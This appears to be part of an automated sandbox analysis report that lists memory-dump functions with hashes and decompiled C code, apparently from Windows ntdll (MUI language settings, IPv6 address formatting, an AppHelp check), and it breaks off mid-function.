                                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFD5C, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFE24, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFFFC, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFF34, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00918788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00918788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00918460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E008FE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0091718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00918460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E008FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0091718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00918460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00918460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00918460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E008FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E008FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0091718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E008FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E008F2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0090E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E008FE2A8(_t322,  &_v68, _v16);
								if(E00915553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0090E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E008FE2A8(_t322,  &_v68, _t236);
								if(E00915553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E008FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E008FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0091718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E008FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E008F2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0090E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E008FE2A8(_v12,  &_v68, _v16);
							if(E00915553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0090E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E008FE2A8(_t322,  &_v68, _t269);
							if(E00915553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E008FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E008FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0091718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E008FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E008F2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0090E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E008FE2A8(_v12,  &_v68, _v16);
						if(E00915553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0090E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E008FE2A8(_t322,  &_v68, _t296);
						if(E00915553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E008FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E008FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x00918788
                                                0x00918788
                                                0x00918791
                                                0x00918794
                                                0x00918798
                                                0x0091879b
                                                0x0091879e
                                                0x009187a1
                                                0x009187a4
                                                0x009187a7
                                                0x009187aa
                                                0x009187af
                                                0x00961ad3
                                                0x00918b0a
                                                0x00918b0d
                                                0x00918b13
                                                0x00918b19
                                                0x00918b1f
                                                0x00918b25
                                                0x00918b2b
                                                0x00918b31
                                                0x00918b37
                                                0x00918b3d
                                                0x00918b46
                                                0x00918b46
                                                0x009187c6
                                                0x009187d0
                                                0x00961ae0
                                                0x00961ae6
                                                0x00961af8
                                                0x00961af8
                                                0x00961afd
                                                0x00961afe
                                                0x00961b01
                                                0x00961b06
                                                0x00961b06
                                                0x009187d6
                                                0x009187f2
                                                0x009187f7
                                                0x00918807
                                                0x0091880a
                                                0x0091880f
                                                0x00918810
                                                0x00918813
                                                0x00918818
                                                0x00918818
                                                0x0091882c
                                                0x00918831
                                                0x00918838
                                                0x00918908
                                                0x00918920
                                                0x009189f0
                                                0x00918a08
                                                0x00918af6
                                                0x00918af6
                                                0x00918af8
                                                0x00918afb
                                                0x00961beb
                                                0x00961beb
                                                0x00918b04
                                                0x00961bf8
                                                0x00961c0e
                                                0x00961c13
                                                0x00961c16
                                                0x00961c16
                                                0x00961bf8
                                                0x00000000
                                                0x00918b04
                                                0x00918a0e
                                                0x00918a11
                                                0x00918a14
                                                0x00918a15
                                                0x00918a18
                                                0x00918a22
                                                0x00918b59
                                                0x00918a28
                                                0x00918a3c
                                                0x00918a3c
                                                0x00918a42
                                                0x00961bb0
                                                0x00961b11
                                                0x00961b11
                                                0x00000000
                                                0x00918a48
                                                0x00918a51
                                                0x00918a5b
                                                0x00918a5e
                                                0x00918a61
                                                0x00918a69
                                                0x00918a69
                                                0x00918a6d
                                                0x00000000
                                                0x00000000
                                                0x00918a74
                                                0x00918a7c
                                                0x00918a7d
                                                0x00918a91
                                                0x00918a93
                                                0x00918a93
                                                0x00918a98
                                                0x00918a9b
                                                0x00918aa1
                                                0x00918aa1
                                                0x00918aa4
                                                0x00918aaa
                                                0x00918ab1
                                                0x00918ac5
                                                0x00918ac7
                                                0x00918ac7
                                                0x00918ac5
                                                0x00918ace
                                                0x00961bc9
                                                0x00961bce
                                                0x00961bd2
                                                0x00961bd2
                                                0x00918ad8
                                                0x00918aeb
                                                0x00918aeb
                                                0x00918af0
                                                0x00918af4
                                                0x00000000
                                                0x00918af4
                                                0x00918a42
                                                0x00918926
                                                0x00918929
                                                0x0091892c
                                                0x0091892d
                                                0x00918930
                                                0x00918935
                                                0x0091893a
                                                0x00918b51
                                                0x00918940
                                                0x00918954
                                                0x00918954
                                                0x0091895a
                                                0x00961b63
                                                0x00000000
                                                0x00918960
                                                0x00918969
                                                0x00918973
                                                0x00918976
                                                0x00918979
                                                0x0091897e
                                                0x00918981
                                                0x00918981
                                                0x00918986
                                                0x00000000
                                                0x00000000
                                                0x00961b6e
                                                0x00961b74
                                                0x00961b7b
                                                0x00961b8f
                                                0x00961b91
                                                0x00961b91
                                                0x00961b99
                                                0x00961b9c
                                                0x00961ba2
                                                0x00961ba2
                                                0x0091898c
                                                0x00918992
                                                0x00918999
                                                0x009189ad
                                                0x00961ba8
                                                0x00961ba8
                                                0x009189ad
                                                0x009189b6
                                                0x009189c8
                                                0x009189cd
                                                0x009189d0
                                                0x009189d0
                                                0x009189d6
                                                0x009189e8
                                                0x009189e8
                                                0x009189ed
                                                0x00000000
                                                0x009189ed
                                                0x0091895a
                                                0x0091883e
                                                0x00918841
                                                0x00918844
                                                0x00918845
                                                0x00918848
                                                0x0091884d
                                                0x00918852
                                                0x00918b49
                                                0x00918858
                                                0x0091886c
                                                0x0091886c
                                                0x00918872
                                                0x00961b0e
                                                0x00000000
                                                0x00918878
                                                0x00918881
                                                0x0091888b
                                                0x0091888e
                                                0x00918891
                                                0x00918896
                                                0x00918899
                                                0x00918899
                                                0x0091889e
                                                0x00000000
                                                0x00000000
                                                0x00961b21
                                                0x00961b27
                                                0x00961b2e
                                                0x00961b42
                                                0x00961b44
                                                0x00961b44
                                                0x00961b4c
                                                0x00961b4f
                                                0x00961b55
                                                0x00961b55
                                                0x009188a4
                                                0x009188aa
                                                0x009188b1
                                                0x009188c5
                                                0x00961b5b
                                                0x00961b5b
                                                0x009188c5
                                                0x009188ce
                                                0x009188e0
                                                0x009188e5
                                                0x009188e8
                                                0x009188e8
                                                0x009188ee
                                                0x00918900
                                                0x00918900
                                                0x00918905
                                                0x00000000
                                                0x00918905

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00918914
                                                • Kernel-MUI-Language-SKU, xrefs: 009189FC
                                                • Kernel-MUI-Number-Allowed, xrefs: 009187E6
                                                • Kernel-MUI-Language-Allowed, xrefs: 00918827
                                                • WindowsExcludedProcs, xrefs: 009187C1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: 0a4928db8339da798c7775e4f85d33b3514673e12341860821db48d8220353da
                                                • Instruction ID: 5f4a310b4fe10cd2cc64cf15b2fbca81fbc30a2834e37441c045b86495b87b23
                                                • Opcode Fuzzy Hash: 0a4928db8339da798c7775e4f85d33b3514673e12341860821db48d8220353da
                                                • Instruction Fuzzy Hash: 09F1EBB1D0020DEFCF11DFA9C981AEEB7B8FF48300F15446AE505A7261EB359A85DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009313CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 38%
                                                			E009313CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00927707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x8f2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00927707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x8f9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00927707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00927707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00927707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00927707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                0x009313d5
                                                0x009313d9
                                                0x009313dc
                                                0x009313de
                                                0x009313e1
                                                0x009313e8
                                                0x009313ee
                                                0x0095e8fd
                                                0x00000000
                                                0x0095e921
                                                0x0095e921
                                                0x0095e928
                                                0x0095e982
                                                0x0095e98a
                                                0x00000000
                                                0x0095e99a
                                                0x0095e99e
                                                0x0095e9a3
                                                0x0095e9a8
                                                0x0095e9b9
                                                0x0095e978
                                                0x00000000
                                                0x0095e978
                                                0x0095e98a
                                                0x0095e92a
                                                0x0095e931
                                                0x0095e944
                                                0x0095e944
                                                0x0095e950
                                                0x0095e954
                                                0x0095e959
                                                0x0095e95e
                                                0x0095e963
                                                0x0095e970
                                                0x00000000
                                                0x0095e975
                                                0x0095e93b
                                                0x0095e980
                                                0x00000000
                                                0x0095e980
                                                0x0095e942
                                                0x0095e94b
                                                0x00000000
                                                0x0095e94b
                                                0x00000000
                                                0x0095e942
                                                0x009313f4
                                                0x009313f4
                                                0x009313f9
                                                0x009313fc
                                                0x009313ff
                                                0x00931406
                                                0x0095e9cc
                                                0x0095e9d2
                                                0x0095e9d2
                                                0x0095e9cc
                                                0x0093140c
                                                0x00931411
                                                0x00931431
                                                0x0093143a
                                                0x0093143c
                                                0x0093143f
                                                0x0093143f
                                                0x00931442
                                                0x00931447
                                                0x009314a8
                                                0x009314ac
                                                0x0095e9e2
                                                0x0095e9e7
                                                0x0095e9ec
                                                0x0095ea05
                                                0x0095ea05
                                                0x00000000
                                                0x00931449
                                                0x00000000
                                                0x00931449
                                                0x0093144c
                                                0x00931459
                                                0x00931462
                                                0x00931469
                                                0x0093146a
                                                0x00931470
                                                0x00931473
                                                0x00931476
                                                0x00931476
                                                0x00931490
                                                0x00931495
                                                0x0093138e
                                                0x00931390
                                                0x00931397
                                                0x00931398
                                                0x00931399
                                                0x009313a1
                                                0x009313a4
                                                0x009313a4
                                                0x00931498
                                                0x0093149c
                                                0x0093149f
                                                0x009314a2
                                                0x00000000
                                                0x00000000
                                                0x009314a4
                                                0x00000000
                                                0x009314a4
                                                0x00931413
                                                0x00931415
                                                0x00931416
                                                0x00931419
                                                0x0093141c
                                                0x00931422
                                                0x009313b7
                                                0x009313bc
                                                0x009313bf
                                                0x009313bf
                                                0x009313c2
                                                0x00931424
                                                0x00931424
                                                0x00931424
                                                0x00931427
                                                0x0093142b
                                                0x0093142c
                                                0x0093142c
                                                0x0093142c
                                                0x00000000
                                                0x0093141c
                                                0x00931411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 019981cb88dfd5c805da7a50bd5d1f45720beba5c1b5fe8a41d6ea64058dd138
                                                • Instruction ID: a6816f7a713f62fed6206e03f3a652450065926b3c8eaf3a75a3e473f893c736
                                                • Opcode Fuzzy Hash: 019981cb88dfd5c805da7a50bd5d1f45720beba5c1b5fe8a41d6ea64058dd138
                                                • Instruction Fuzzy Hash: 61613871904655AACF28DFA9C8908BFBBB9EF94301B14C42DF5E647660D335AB44CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00927EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E00927EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x9d2088; // 0x774fe2a0
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00927F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00943F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E008FDFC0( &_v540, 0, 0x214);
